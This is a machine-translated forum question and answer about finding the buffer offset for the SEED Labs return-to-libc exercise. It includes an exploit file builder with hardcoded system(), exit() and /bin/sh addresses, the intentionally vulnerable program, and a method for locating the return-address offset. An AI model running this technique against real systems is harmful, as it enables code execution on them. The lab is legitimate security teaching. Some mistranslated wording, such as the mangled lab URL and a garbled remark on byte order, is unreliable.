如何查找缓冲区偏移量以返回到Libc攻击

Question

我正在试图找到实现缓冲区溢出攻击的缓冲区。

实验室链接也在这里：https://seedsecuritylabs.org/Labs_16.04/PDF/报表_至_Libc.pdf

如何在缓冲区为150的libc攻击中找到X？这是提供给我们的攻击代码，我已经找到了缓冲区需要写入的地址，但是，我只需要X：

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {

    char buf[40];
    FILE *badfile;
    badfile = fopen("./badfile", "w");

/* You need to decide the addresses and the values for X, Y, Z. The order of the following three
statements does not imply the order of X, Y, Z. Actually, we intentionally scrambled the order. */

    *(long *) &buf[X] = 0xbffffdd4; // /bin/sh

    *(long *) &buf[Y] = 0xb7e42da0; // system()

    *(long *) &buf[Z] = 0xb7e369d0; // exit()

    fwrite(buf, sizeof(buf), 1, badfile);

    fclose(badfile);

}

这也是给予我们的脆弱方案：

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Changing this size will change the layout of the stack. * Instructors can change this value each
year, so students * won’t be able to use the solutions from the past. * Suggested value: between 0
and 200 (cannot exceed 300, or * the program won’t have a buffer-overflow problem). */

#ifndef BUF_SIZE
#define BUF_SIZE 150
#endif

int bof(FILE *badfile) {

    char buffer[BUF_SIZE];

    /* The following statement has a buffer overflow problem */ fread(buffer, sizeof(char), 300, 
    badfile);

    return 1;

}

int main(int argc, char **argv) {

    FILE *badfile;

    /* Change the size of the dummy array to randomize the parameters for this lab. Need to use the array         
    at least once */

    char dummy[BUF_SIZE*5]; memset(dummy, 0, BUF_SIZE*5);

    badfile = fopen("badfile", "r");

    bof(badfile);

    printf("Returned Properly\n");

    fclose(badfile);

    return 1;

}

Answer 1

这样做的一个简单方法是使用以下表单'a'*BUFF_SIZE + 'qwertyuiopasdfghjklzxcvbnm'的输入。返回地址将被该字符串中的4个连续字符(假设32位系统)覆盖。使用此输入运行您的程序，它自然会产生分段错误。使用dmesg | tail查找它跳到的地址。说出来的是zlkj。所以现在你有了偏移量。只需将jklz替换为您想跳转的地址即可。在更换地址的同时，一定要照顾好孩子。